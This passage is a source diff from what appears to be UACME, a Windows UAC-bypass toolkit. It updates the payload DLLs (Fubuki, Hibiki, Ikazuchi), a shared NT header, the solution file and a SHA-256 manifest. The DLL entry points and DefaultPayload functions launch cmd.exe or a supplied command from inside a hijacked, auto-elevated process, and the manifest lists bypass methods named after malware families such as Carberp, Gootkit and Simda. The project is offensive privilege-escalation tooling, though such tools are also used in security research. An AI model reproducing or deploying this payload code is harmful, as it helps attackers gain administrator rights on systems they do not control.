RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo));
RtlSecureZeroMemory(&processInfo, sizeof(processInfo));
startupInfo.cb = sizeof(startupInfo);
GetStartupInfoW(&startupInfo);
GetStartupInfo(&startupInfo);
RtlSecureZeroMemory(sysdir, sizeof(sysdir));
cch = ucmExpandEnvironmentStrings(TEXT("%systemroot%\\system32\\"), sysdir, MAX_PATH);
@ -260,7 +263,10 @@ BOOL WINAPI DllMain(
_strcpy(cmdbuf, sysdir);
_strcat(cmdbuf, TEXT("cmd.exe"));
if (CreateProcessW(cmdbuf, NULL, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL,
startupInfo.dwFlags = STARTF_USESHOWWINDOW;
startupInfo.wShowWindow = SW_SHOW;
if (CreateProcess(cmdbuf, NULL, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL,
sysdir, &startupInfo, &processInfo))
{
CloseHandle(processInfo.hProcess);

BIN
Source/Akatsuki/version.rc
View File

Binary file not shown.

2
Source/Fubuki/dll.vcxproj
View File

@ -336,11 +336,13 @@
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="..\Shared\ultostr.c" />
<ClCompile Include="..\Shared\_filename.c" />
<ClCompile Include="..\shared\_strcat.c" />
<ClCompile Include="..\Shared\_strcmpi.c" />
<ClCompile Include="..\shared\_strcpy.c" />
<ClCompile Include="..\Shared\_strend.c" />
<ClCompile Include="..\Shared\_strlen.c" />
<ClCompile Include="dllmain.c" />
</ItemGroup>
<ItemGroup>

6
Source/Fubuki/dll.vcxproj.filters
View File

@ -55,6 +55,12 @@
<ClCompile Include="..\Shared\_strcmpi.c">
<Filter>minirtl</Filter>
</ClCompile>
<ClCompile Include="..\Shared\_strlen.c">
<Filter>minirtl</Filter>
</ClCompile>
<ClCompile Include="..\Shared\ultostr.c">
<Filter>minirtl</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<None Include="export.def">

28
Source/Fubuki/dllmain.c
View File

@ -4,9 +4,9 @@
*
* TITLE: DLLMAIN.C
*
* VERSION: 2.71
* VERSION: 2.74
*
* DATE: 07 May 2017
* DATE: 20 June 2017
*
* Proxy dll entry point, Fubuki Kai Ni.
*
@ -84,13 +84,13 @@ void ucmShowProcessIntegrityLevel(
)
{
NTSTATUS status;
HANDLE hToken;
HANDLE hToken = NULL;
ULONG LengthNeeded;
ULONG LengthNeeded = 0;
PTOKEN_MANDATORY_LABEL pTIL = NULL;
DWORD dwIntegrityLevel;
WCHAR *t = NULL;
LPWSTR lpText = NULL;
WCHAR szBuffer[MAX_PATH + 1];
status = NtOpenProcessToken(NtCurrentProcess(), TOKEN_QUERY, &hToken);
@ -109,25 +109,25 @@ void ucmShowProcessIntegrityLevel(
if (dwIntegrityLevel == SECURITY_MANDATORY_LOW_RID)
{
t = L"Low Process";
lpText = L"Low Process";
}
else if (dwIntegrityLevel >= SECURITY_MANDATORY_MEDIUM_RID &&
dwIntegrityLevel < SECURITY_MANDATORY_HIGH_RID)
{
t = L"Medium Process";
lpText = L"Medium Process";
}
else if (dwIntegrityLevel == SECURITY_MANDATORY_HIGH_RID)
{
t = L"High Integrity Process";
lpText = L"High Integrity Process";
}
else if (dwIntegrityLevel == SECURITY_MANDATORY_SYSTEM_RID)
{
t = L"System Integrity Process";
lpText = L"System Integrity Process";
}
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
wsprintf(szBuffer, L"PID=%lu, IntegrityLevel=%ws",
GetCurrentProcessId(), t);
GetCurrentProcessId(), lpText);
}
LocalFree(pTIL);
@ -135,7 +135,12 @@ void ucmShowProcessIntegrityLevel(
}
NtClose(hToken);
}
if (t) MessageBox(GetDesktopWindow(), szBuffer, GetCommandLineW(), MB_ICONINFORMATION);
if (lpText) {
MessageBox(GetDesktopWindow(),
szBuffer,
GetCommandLine(),
MB_ICONINFORMATION);
}
}
/*
@ -245,6 +250,7 @@ VOID DefaultPayload(
RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo));
RtlSecureZeroMemory(&processInfo, sizeof(processInfo));
startupInfo.cb = sizeof(startupInfo);
//GetStartupInfo(&startupInfo);
RtlSecureZeroMemory(sysdir, sizeof(sysdir));
cch = ExpandEnvironmentStrings(TEXT("%systemroot%\\system32\\"), sysdir, MAX_PATH);

BIN
Source/Fubuki/version.rc
View File

Binary file not shown.

10
Source/Hibiki/dllmain.c
View File

@ -4,9 +4,9 @@
*
* TITLE: DLLMAIN.C
*
* VERSION: 2.70
* VERSION: 2.74
*
* DATE: 21 Mar 2017
* DATE: 20 June 2017
*
* AVrf entry point, Hibiki Kai Ni.
*
@ -346,6 +346,9 @@ BOOL ucmQueryCustomParameter(
startupInfo.cb = sizeof(startupInfo);
ucmGetStartupInfo(&startupInfo);
startupInfo.dwFlags = STARTF_USESHOWWINDOW;
startupInfo.wShowWindow = SW_SHOW;
bResult = pCreateProcessW(NULL, lpParameter, NULL, NULL, FALSE, 0, NULL,
NULL, &startupInfo, &processInfo);
@ -404,6 +407,9 @@ VOID ucmbRunTarget(
_strcpy_w(cmdbuf, sysdir);
_strcat_w(cmdbuf, L"cmd.exe");
startupInfo.dwFlags = STARTF_USESHOWWINDOW;
startupInfo.wShowWindow = SW_SHOW;
if (pCreateProcessW(cmdbuf, NULL, NULL, NULL, FALSE, 0, NULL,
sysdir, &startupInfo, &processInfo))
{

BIN
Source/Hibiki/version.rc
View File

Binary file not shown.

18
Source/Ikazuchi/dllmain.c
View File

@ -4,9 +4,9 @@
*
* TITLE: DLLMAIN.C
*
* VERSION: 2.70
* VERSION: 2.74
*
* DATE: 21 Mar 2017
* DATE: 20 June 2017
*
* Proxy dll entry point, Ikazuchi.
*
@ -402,7 +402,7 @@ BOOL ucmQueryCustomParameter(
HKEY hKey = NULL;
PVOID ProcessHeap = NtCurrentPeb()->ProcessHeap;
LPWSTR lpData = NULL, lpParameter = NULL, lpszParamKey = NULL;
STARTUPINFOW startupInfo;
STARTUPINFO startupInfo;
PROCESS_INFORMATION processInfo;
ULONG bytesIO = 0L;
OBJSCANPARAM Param;
@ -467,7 +467,10 @@ BOOL ucmQueryCustomParameter(
startupInfo.cb = sizeof(startupInfo);
GetStartupInfo(&startupInfo);
bResult = CreateProcessW(NULL, lpParameter, NULL, NULL, FALSE, 0, NULL,
startupInfo.dwFlags = STARTF_USESHOWWINDOW;
startupInfo.wShowWindow = SW_SHOW;
bResult = CreateProcess(NULL, lpParameter, NULL, NULL, FALSE, 0, NULL,
NULL, &startupInfo, &processInfo);
if (bResult) {
@ -525,7 +528,7 @@ BOOL WINAPI DllMain(
RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo));
RtlSecureZeroMemory(&processInfo, sizeof(processInfo));
startupInfo.cb = sizeof(startupInfo);
GetStartupInfoW(&startupInfo);
GetStartupInfo(&startupInfo);
RtlSecureZeroMemory(sysdir, sizeof(sysdir));
cch = ExpandEnvironmentStrings(TEXT("%systemroot%\\system32\\"), sysdir, MAX_PATH);
@ -534,7 +537,10 @@ BOOL WINAPI DllMain(
_strcpy(cmdbuf, sysdir);
_strcat(cmdbuf, TEXT("cmd.exe"));
if (CreateProcessW(cmdbuf, NULL, NULL, NULL, FALSE, 0, NULL,
startupInfo.dwFlags = STARTF_USESHOWWINDOW;
startupInfo.wShowWindow = SW_SHOW;
if (CreateProcess(cmdbuf, NULL, NULL, NULL, FALSE, 0, NULL,
sysdir, &startupInfo, &processInfo))
{
CloseHandle(processInfo.hProcess);

BIN
Source/Ikazuchi/version.rc
View File

Binary file not shown.

23
Source/Shared/ntos.h
View File

@ -4,9 +4,9 @@
*
* TITLE: NTOS.H
*
* VERSION: 1.70
* VERSION: 1.71
*
* DATE: 27 May 2017
* DATE: 28 May 2017
*
* Common header file for the ntos API functions and definitions.
*
@ -5605,6 +5605,11 @@ NTSTATUS NTAPI NtDuplicateToken(
_Out_ PHANDLE NewTokenHandle
);
#define DISABLE_MAX_PRIVILEGE 0x1 // winnt
#define SANDBOX_INERT 0x2 // winnt
#define LUA_TOKEN 0x4
#define WRITE_RESTRICT 0x8
NTSTATUS NTAPI NtFilterToken(
_In_ HANDLE ExistingTokenHandle,
_In_ ULONG Flags,
@ -5658,20 +5663,6 @@ NTSTATUS NTAPI NtQueryInformationToken(
_Out_ PULONG ReturnLength
);
#define DISABLE_MAX_PRIVILEGE 0x1 // winnt
#define SANDBOX_INERT 0x2 // winnt
#define LUA_TOKEN 0x4
#define WRITE_RESTRICT 0x8
NTSTATUS NTAPI NtFilterToken(
_In_ HANDLE ExistingTokenHandle,
_In_ ULONG Flags,
_In_opt_ PTOKEN_GROUPS SidsToDisable,
_In_opt_ PTOKEN_PRIVILEGES PrivilegesToDelete,
_In_opt_ PTOKEN_GROUPS RestrictedSids,
_Out_ PHANDLE NewTokenHandle
);
NTSTATUS NTAPI NtCreateKey(
_Out_ PHANDLE KeyHandle,
_In_ ACCESS_MASK DesiredAccess,

8
Source/uacme.sln
View File

@ -59,10 +59,10 @@ Global
{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Release|Win32.Build.0 = Release|Win32
{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Release|x64.ActiveCfg = Release|x64
{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Release|x64.Build.0 = Release|x64
{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|Win32.ActiveCfg = ReleaseInternal|Win32
{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|Win32.Build.0 = ReleaseInternal|Win32
{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|x64.ActiveCfg = ReleaseInternal|x64
{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|x64.Build.0 = ReleaseInternal|x64
{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|Win32.ActiveCfg = Release|Win32
{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|Win32.Build.0 = Release|Win32
{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|x64.ActiveCfg = Release|x64
{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|x64.Build.0 = Release|x64
{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Debug|Win32.ActiveCfg = Release|Win32
{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Debug|Win32.Build.0 = Release|Win32
{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Debug|x64.ActiveCfg = Debug|x64

86
UACME.sha256
View File

@ -1,8 +1,8 @@
46e4306bdea79c3e8269b78637bbbe510d6ee65ea18268f7788aec26b4806c41 *Compiled\Akagi32.exe
b0e32db8c822014c282ef3aba46bac0bf934c4c3d0fcde2f3bf5f64f39789044 *Compiled\Akagi64.exe
b20d491148d3a52b8de0783bc5879682b8f0a62c38e81b594a3848e2e918d059 *Compiled\Akagi32.exe
a98802c8f2e68ff9568feaa1fb2e30e88601e1d50169454239d44f188bcf2482 *Compiled\Akagi64.exe
376d63708d4e0d761f6d9224b9d5504c07b3cd5b5ae5fd40a3a3d77c4d5873d5 *Compiled\UacInfo64.exe
c7aa5be04dbf1ffdd076120a617eb5e7ea154a37f5811de5b30fa006c69a4c7c *Compiled\Symdll\readme1st.txt
4d14153dd95bd5441763283de03afb74aa5f3fc0b68d7629be43d27e3d41c5e1 *Source\uacme.sln
4055ddeaea8805ded4aba4b730ed799e5187eaa29381c59f0ecc0f3a6d10b090 *Source\uacme.sln
8172069709954a5616b75306e565cbc5cd5baada00c15cba084420e61bebcdaf *Source\Akagi\akagi.ico
02238b1720b8514de36ae80fa3d07c377d22e6befe99a7b87d4da9d60d23be02 *Source\Akagi\akagi.manifest
3fb2b94aa2ee33753fcc20fa1834be8a929a29248217cfb84a54956eeea1a824 *Source\Akagi\bin32res.h
@ -11,92 +11,96 @@ c7aa5be04dbf1ffdd076120a617eb5e7ea154a37f5811de5b30fa006c69a4c7c *Compiled\Symdl
82684e4844773aa06296e76697cb2777bb4cb1cb23b06aa0c2dcc80fea33ca3d *Source\Akagi\bin64res.rc
a552fb7dfd3982f2ed58a745b928b8146a8632499dc01a64f534646caf02450e *Source\Akagi\compress.c
9f93bbb4c77349179641415ec9a4367a6f77dc28b093d3d11231f6abf8c3cd78 *Source\Akagi\compress.h
ea90559a90c70292830258de4265a39fbab63408ab41711ad824eed5e6730fdf *Source\Akagi\consts.h
5e5c5c2b73d8b4d1ac33a25714834349625a5f0e580582d0375fd0969d6d9297 *Source\Akagi\global.h
1346bd4919e656fc5b3bff0f9e8b4b7ab928ad006b7af89952eef5275ae52220 *Source\Akagi\main.c
2cd1eb208e9728b7cc3c2172b8ff0cb383b1aacef774d6b3aca704447e64b023 *Source\Akagi\consts.h
2a14b3238a613d4d2beb9061771f27a4a8d55da2ec80e210cd7a8e84bb29ebb9 *Source\Akagi\global.h
9d2fff691a6ac0fdddff9ff13523ed7933180b72d6a9cb4ccba5e9b425647c1c *Source\Akagi\main.c
a8ec3b9411f2408b5cfa4b0c77aa045957d3144aebd343cfa7da03d78226e3b3 *Source\Akagi\makecab.c
bd7f1ebd11ed2313bef81c4701b2444ab37d9723493bfeb9de5db2063a5213e2 *Source\Akagi\makecab.h
f1b82b53b74b4586c58b0e3a87aceb1ee43e493ef58aa9490297c6bbef247de0 *Source\Akagi\manifest.h
c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d *Source\Akagi\resource.h
dae1ff25ab3cfa35aacd0eb1aace255ab4aa2c578d656fb81b13664d02d176e3 *Source\Akagi\Resource.rc
1cf5e1ebaf5cfb80b420fb87ff8f7d31a2b9b75dc338edb4ea6820c4beeaf36c *Source\Akagi\sup.c
37953ab7189a09fce908de75b5ce2871aaad5a04c78dca833e13318d93ece3a8 *Source\Akagi\sup.h
b4fb5f94264c6275b862f56ed754e72c9858c9ab44fc2ee9f0d26fe1192f8295 *Source\Akagi\Resource.rc
cb63e87aef0a85916b7d7d5881f41e1ca9800ddb878f242126110cd467653162 *Source\Akagi\sup.c
0da9d7e9e882862172b7deaf5f95d0c1e18beb5bab8b2c699e6087b3d248f19f *Source\Akagi\sup.h
a13d31cf040775c51471e3fe6b4863d879fefb189798a24f76189abaebdbdf27 *Source\Akagi\uacme.suppress
f7c0c94121c78c93f553c1841b9963a756fd0cb24dd384eeb434aac6349cd380 *Source\Akagi\uacme.vcxproj
4f3e050a0b73b1b9b06c94ca375c4b9f19352fed23d18514fb116f236049f7eb *Source\Akagi\uacme.vcxproj.filters
cc2dfcc6ea3c2c3f81ba00d43c104466b4c6b3208563a7fd3707131160bbd1f4 *Source\Akagi\uacme.vcxproj.user
5e9603e1877053c533994070273c4e72c39d9e0a7b26c008184acd5f7ca4cf3a *Source\Akagi\uacme.vcxproj
e44d0f266561f7aef3b87a86d133a47af49cd920a66083804b02c889c73b4589 *Source\Akagi\uacme.vcxproj.filters
d827c128f425851492e2e7ed1cf633fab3714c1499a41eae4e01bd8112c3ed73 *Source\Akagi\uacme.vcxproj.user
2d05d08e1436fa05e5247e876b3f187b3354b76f4cabfecbdc4e557968037424 *Source\Akagi\windefend.c
1b9e0a1f3734feb1d1f94defb48972b479225d76fc97997c9b240c0f3b6453a8 *Source\Akagi\windefend.h
2944aac59b81edecf5a358be9b81d04d40774b8d0c0898b08ddf5de7992296d0 *Source\Akagi\bin\Akatsuki64.cd
c29a55e1da15ee51bf197c190b4b802c03daf0ab66394c83dc9ae9409e55cc51 *Source\Akagi\bin\Fubuki32.cd
76ebc6f06a8151396cd240d6bf772504cfc8b5eed6855e8653c60cdcf52e5d10 *Source\Akagi\bin\Fubuki64.cd
945b6d413e4429dffc930f864595bf9f330067903a70f9d06ab93cb8106ae26c *Source\Akagi\bin\Hibiki32.cd
92770263151595b6b152438a7e83028eee954cae818150e46d13bb1f8cc831df *Source\Akagi\bin\Hibiki64.cd
7e1c3c9cb2ac6a7a4e822d4ac0e2fe7ae6adec19790a82fbbc8fc3a9e1f7c47c *Source\Akagi\bin\Ikazuchi32.cd
d7928e793977925b9800926b567348517d23d7934ebb9f0992b9fc0c6b24d073 *Source\Akagi\bin\Ikazuchi64.cd
47d2753928ca704a5544ca12fdff8583ff604ce2d440f3109ab3b6ded91b4b70 *Source\Akagi\bin\Akatsuki64.cd
cbe156de6d8d3b5e10422f15a528050e348567ab9b98ac54b6e15b53025a9ed5 *Source\Akagi\bin\Fubuki32.cd
d61fc7009f7fcfb12a8eab1ab024a3065bb0869fcf269794256b19e15ec6af34 *Source\Akagi\bin\Fubuki64.cd
c1ed6f0600544df6921e7d51eb8e0f08ad853d0a3412c2962511306e7cf94add *Source\Akagi\bin\Hibiki32.cd
0f4165ab7f6ac1b570022762d7a35aad0b61112edecfacda3a9f8ee5ade3b986 *Source\Akagi\bin\Hibiki64.cd
83aca570f739d0c3492a0191bb4ea9f0986c5e1d0f05650f1f3945e0468eaf5f *Source\Akagi\bin\Ikazuchi32.cd
2ca54d3cb0e1233f231a4c2dd7a576e705538dbdb53c8e11727c158bb1448513 *Source\Akagi\bin\Ikazuchi64.cd
46f01b4e452c8c6d4d62f7c99928dc13ec3a751512bfaaeebcbbbcf62523cd76 *Source\Akagi\bin\Kongou32.cd
4f336b9b9827366d686442ea6018d90e9cee1c876ea79c39a018d9fe0e164be8 *Source\Akagi\bin\Kongou64.cd
d2e98979ba296abb4cad7ab142db85da10a62b6c2193f89e206a4c2ed5ff19db *Source\Akagi\lib\AppHelp32.lib
dc7fe105fd095121932b4c483ebcbf35d729fefeab7a7fb766fe9a3953f91ef1 *Source\Akagi\lib\AppHelp64.lib
c38c4dc7d03484215e6fa531a795e80bd1951504ca6938cad5886d17adbf4a27 *Source\Akagi\methods\apphelp.h
c994f782c64a1a18caaab60418de573ade7e87fdc964e25557ac79eb549c7cd5 *Source\Akagi\methods\carberp.c
d9ac1c8eedf9c9d5ed6cbf0ffeeaa13ba376760ade0d1dc6750121ed48a5b63b *Source\Akagi\methods\carberp.h
01f2327ec6dfdd859a5372f24dfaec5024fe3cd5795647991b79bbb88d19764e *Source\Akagi\methods\carberp.c
b866af0a9a4ad85432c13dc02fbb7e360bbe069dd5e45e86de9e1a6aeb91d449 *Source\Akagi\methods\carberp.h
0182da81c73323b843725eaec652ec2f2c95231e302b765de2ce37e09c899ab9 *Source\Akagi\methods\comet.c
7619c01b21279a0f318e7f3c091f5b54f9a37425b4a083e277e0adfc11da2913 *Source\Akagi\methods\comet.h
393ba6fbfe154be58e018066bb2edcce2abb2b6bc3a209de23a279a0edde153e *Source\Akagi\methods\enigma0x3.c
5dbbf2af06f6bf545ab7c889fe7a6cf0653036c545aa29b8dc77086ee3304e10 *Source\Akagi\methods\comfileop.c
7c1e67ec03370d4e97fc5947a832090bf8283641c19f7cad1cb8f3d93385bac2 *Source\Akagi\methods\comfileop.h
4336d458f3c40c5f874bd0db1e01bf29016ddb2c8ff807bbe4b89ff29e5127ac *Source\Akagi\methods\enigma0x3.c
878dd7452a54e15999a0eab9dc22c4bc7cbb5e5b5e71cfece307349eb79e4dc5 *Source\Akagi\methods\enigma0x3.h
e297e3858f2754f7d45876c087d606a2b10e6007ff96fdc00e27db6c731f163c *Source\Akagi\methods\explife.c
1b3b895fa6b99df9055b6514e8dc5212ce61cd7d2500c2fea95085440e7b5b34 *Source\Akagi\methods\explife.h
be58d05b4f21e4cbc7a06d409c2f0002eee660d8a9017b1d103f35cdb7d9461c *Source\Akagi\methods\gootkit.c
7a01e30bf58f6e87112812e11fd81e250ecfadfe9fb1206e9f4ec06607dad714 *Source\Akagi\methods\gootkit.h
5887a1083e6343ea5e6effbd0def4631fc988df14e0a4c2147d68cb70e90fcf2 *Source\Akagi\methods\hybrids.c
6327a9b8e9c19adee0d56e666756dd4a0edcc327c8ed0341f11bb80e12feaaa5 *Source\Akagi\methods\hybrids.h
3155b7598ca2aad4e77a48f0351a8436c8780384820e83422bd8c2afb12a4586 *Source\Akagi\methods\methods.c
adb791a9ef390b95f6f603c6e88c619c5031f42724843681b1562b9356d4d65a *Source\Akagi\methods\methods.h
fd7e8e20de8f3763a418368431c0b6b7131d940e7b775c165b095f78386b849b *Source\Akagi\methods\pitou.c
9754f1d2195c6d2ef6a228677d1a8fb8e92318aece0c389b3f28a87eeffe9827 *Source\Akagi\methods\pitou.h
7bb57943b4abbe72996ae58d622b62717d9378a2f97be0c115ad6fc76af87285 *Source\Akagi\methods\hybrids.c
858ce14e3179d817220aeda054750371723c2d72e9a59a30f17a2600c38511f3 *Source\Akagi\methods\hybrids.h
effd49a0f695a763302c42dc192647c84712670d5af96ec54c83f09aebb39583 *Source\Akagi\methods\methods.c
ac72b99dd5d456d1a349b23a78a3b5aa99e1a855a08d0689858f451d4af0069b *Source\Akagi\methods\methods.h
4b9ef8073d1e9ad80050a74d53c7c4f11cfed18c6252faf49b2ea00502415a1b *Source\Akagi\methods\pitou.c
9faab51fb7a0614dcf285ea02b468aee1edb50bb00b9dda8da20260d7460d255 *Source\Akagi\methods\pitou.h
3dd668663873b0e7816a2d2e89fb53ae2a418b1338b6530a9e3a1743e8bbd3fd *Source\Akagi\methods\sandworm.c
a38afbbd8ff528662d4f61ea1f688f44778f524d18dcc08badbd182b6537d7a5 *Source\Akagi\methods\sandworm.h
629be7ba979bcf0133b6a222ac358d7c9f3b4fe2f341d284a969b1a279b7dc0e *Source\Akagi\methods\simda.c
3c3a6eb8ee56ccffedd490e87b8a2fdec7e4b09bdb2650d231f2805a27e56ade *Source\Akagi\methods\simda.h
8d95d0c5a788964202100208749ab9744180f0ea36fa222a4a3adc1d0e3f90a1 *Source\Akagi\methods\sirefef.h
813c594498f7f79e160f0775a6886fff179e43416e7aa79709bd779ffde9e582 *Source\Akagi\methods\tyranid.c
0f497dd2915f834f86e0185f369c114f1013475877a7087aa0873a8155d2096f *Source\Akagi\methods\tyranid.c
233335679cbdb8023211a848051420a7e9a02b72c0af89ff0e5eb19fc018edb4 *Source\Akagi\methods\tyranid.h
7266faf9d86af33e32023964bb666bb5fb5288586a38992f020796b75c0e9b15 *Source\Akagi\tests\test.c
508459d7352df2b65d5b5a34b14f28a3c8e5c899ee881f4f8b862b843c197247 *Source\Akagi\methods\wusa.c
711a7d727b1ce6003348ea9e4a909bc7c6b1711fb352fe42b947c7f75003ca52 *Source\Akagi\methods\wusa.h
2bd9ea60ba513fedcfe5e2c98b6c78ebde7ac126ac4c9d6b4f40f6d771a6a420 *Source\Akagi\tests\test.c
b073f6d614bcdc345db660edf36784d1587e3f3ab309bfb871a0ce510faa57a6 *Source\Akagi\tests\test.h
09bd7cf61a0e2bf4474e8a11f88ba61f62fe26138acabc7bac71d336232285fc *Source\Akatsuki\akatsuki.suppress
588fbc961ae8c731d7617bda839ad326cc2f92d6f468cd6de475b4c21bd03a29 *Source\Akatsuki\Akatsuki.vcxproj
060c80fea1ef21d705757ddf9c19b586a7bb17356a356d57358db8143371fe17 *Source\Akatsuki\Akatsuki.vcxproj.filters
9a4b0023e443b33d85280eedb510864c42b4146c8e6e5f742444b3eff0aae55f *Source\Akatsuki\Akatsuki.vcxproj.user
bfc16caf50161dcfbb51d148b66846def870d3856045a818c0965a5984113927 *Source\Akatsuki\dllmain.c
e7722dff186b29d725cd56c476ab0a0439454de81ed5f905804b3a335894ba07 *Source\Akatsuki\dllmain.c
e10acf379efd906f8bf06a28e3b0b5598618c109c8a30f43e831b42f6aaf1950 *Source\Akatsuki\export.def
4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d *Source\Akatsuki\resource.h
9977423977c6294586e91f57334ff22d53860f96a3d3df7adcd31881d78ea98b *Source\Akatsuki\version.rc
7c519388501db074be74bf1a90119eff6193e0085081ea780cdf34a1114f54ee *Source\Akatsuki\version.rc
3f0f2bd8d770b9a92b4a5a05a621987a04ff67c79fba0264208c2cfae2eefc05 *Source\Fubuki\dll.suppress
c391874c4c88a796f1e43dab5c049c69f5b80188511c437a234325db8320febd *Source\Fubuki\dll.vcxproj
2b7c4bfaae209067f3e6b6e2695bd4e101075b0629c062c9c51f2c6546252c62 *Source\Fubuki\dll.vcxproj.filters
5a69f0cae65a683c92fb0cd3139c7544ddb5d48be14e947d6b206c925e7525e3 *Source\Fubuki\dll.vcxproj
cf19572228a04f2564f245b69ef8e0693cea38161b2e088fd3a2d254955cdd55 *Source\Fubuki\dll.vcxproj.filters
cb5688faa7cfe99a609ecdb7131f218628dbe34b8fb39ba83a2328227bc63179 *Source\Fubuki\dll.vcxproj.user
66cc0ce3fa6ffb15e314355328cacab9b75a7b0bcab226de0a1b4d74041bfd81 *Source\Fubuki\dllmain.c
8ca04d5e27c6470bd1d531b508cc3ca824b79552ab1ff580810b357eee3e82ed *Source\Fubuki\dllmain.c
938d2ffe637631e182f1b8e8ebfb642aee1bc854a689b489bf1d9b30335ab5e0 *Source\Fubuki\export.def
4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d *Source\Fubuki\resource.h
a2b59d06ad6f6af9ac19b5b15c987c246eb059eade447b63c3113646c6ef52a0 *Source\Fubuki\unbcl.h
1d5b354a2f9225c3e410b3fc43bf8e9984de8fff8221c9f532483d22e54ab42f *Source\Fubuki\version.rc
dacce5219ceec64ceff5491ed45dfe2ffe7c095fcb30b74db177e3d1541bf839 *Source\Fubuki\version.rc
eccff5e3d98818d8ea5393d86379985c8eee5b0ac44d06e1c8b52b29d96cf066 *Source\Fubuki\wbemcomn.h
039659963ca2e567fe2a2c074c068a5b6ae11ce6664f319f10755f6ea4ff681b *Source\Hibiki\dllmain.c
1e520be61368b89979d0c5605a62c71d1965c9bcbc0b4b18d070203e21913062 *Source\Hibiki\dllmain.c
fc32b236825eaad7806a7cbed561f751496deace5cc0a3b72856d934c879a31a *Source\Hibiki\hibiki.suppress
1df0cd6cef001334dbe6877d8a68d34089f6a0f11dcebc7f1d08d3835d50cd8b *Source\Hibiki\Hibiki.vcxproj
eaf764a71dca55552f81e54f864acf78bb081b8d42de8cfcf67c69347a297809 *Source\Hibiki\Hibiki.vcxproj.filters
cb5688faa7cfe99a609ecdb7131f218628dbe34b8fb39ba83a2328227bc63179 *Source\Hibiki\Hibiki.vcxproj.user
4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d *Source\Hibiki\resource.h
a40b4cd99474e949a1e2fd0621a45eb7431761ee62f814e8a640ada57371eeac *Source\Hibiki\version.rc
f1fddf038d62c308e7a6162e5f1d95d92d6479f00ec2bc3643d1edc500c9620a *Source\Ikazuchi\dllmain.c
1fc3ee88bb60ffc54b1f33429125a30a09a829547a446a86e356f9cca1c7127d *Source\Hibiki\version.rc
eb90b7b4ac53cd6f62deeb8f7028d5fecbfa3c6f03e3ad7e1c235918fbfed52e *Source\Ikazuchi\dllmain.c
14e64356e031e0c1d161f38d4ba8f1e6d55d6ea383c1b967123db80da2f172c2 *Source\Ikazuchi\export.def
c6357613fa00417abeb97834822a0d9a01b8f95d19a3e7358e00cfef88f7598e *Source\Ikazuchi\ikazuchi.suppress
706e38718d616247c8e9a0c6b6a51b5477ca6169c7126b6e26a33d99560fdc50 *Source\Ikazuchi\Ikazuchi.vcxproj
d196af9df08cbdaff3817f0e56bb356ae21e1dcbc6853482f14fd555e98aebb2 *Source\Ikazuchi\Ikazuchi.vcxproj.filters
9a4b0023e443b33d85280eedb510864c42b4146c8e6e5f742444b3eff0aae55f *Source\Ikazuchi\Ikazuchi.vcxproj.user
4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d *Source\Ikazuchi\resource.h
0b23b7f61f21bda96f1515711852f3b9a981efb09623c6d7ed743f81d4a0cf9e *Source\Ikazuchi\version.rc
8ed990126df328775e139b55ab5f192c80e7527aa45f8e5b22bf6517d239940f *Source\Ikazuchi\version.rc
82868f43880065610efe2dc0532876384b3f04d57a17a6f95d5fd71784cfa2db *Source\Inazuma\Inazuma.vcxproj
0cd995b29fdec206817ef1939ac1b9c1a10bc87fff80490f030097a8a0e07c49 *Source\Inazuma\Inazuma.vcxproj.filters
cb5688faa7cfe99a609ecdb7131f218628dbe34b8fb39ba83a2328227bc63179 *Source\Inazuma\Inazuma.vcxproj.user
@ -113,7 +117,7 @@ bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Shared\
01c5aada277c3a7a138ab7c31beda0decee8ec28fe7525e43ca524b2b0270213 *Source\Shared\ldr.c
b22c6d2722fa9e917746502fd4615d28b9c889d7288fc737315150e0ae40ee6f *Source\Shared\ldr.h
107245437ed86b6f1e839b2d3d9bbadb3d9980046cb5c7001f985fed3627962f *Source\Shared\minirtl.h
5d1e45dfb65548af3fa7e13792d4cca37ddbb8324e7ec1c21fd9a6d9ea49922f *Source\Shared\ntos.h
7d7466f9b0f9a1264f8c606e7171b109927507444d04b02c6ae42c755d5e0c00 *Source\Shared\ntos.h
3fccfae61f8e59435c180be88cb46967361ed61ec1314532dddabf12679902b1 *Source\Shared\ntsxs.h
b9de99d3447bb1a125cb92aa1b3f9b56a59522436f1a1a97f23aac9cee90341c *Source\Shared\rtltypes.h
ca0b7a38be2f3f63a69aca6da7b3a62a59fcefee92de00e9796f68d4a2a23158 *Source\Shared\strtoi.c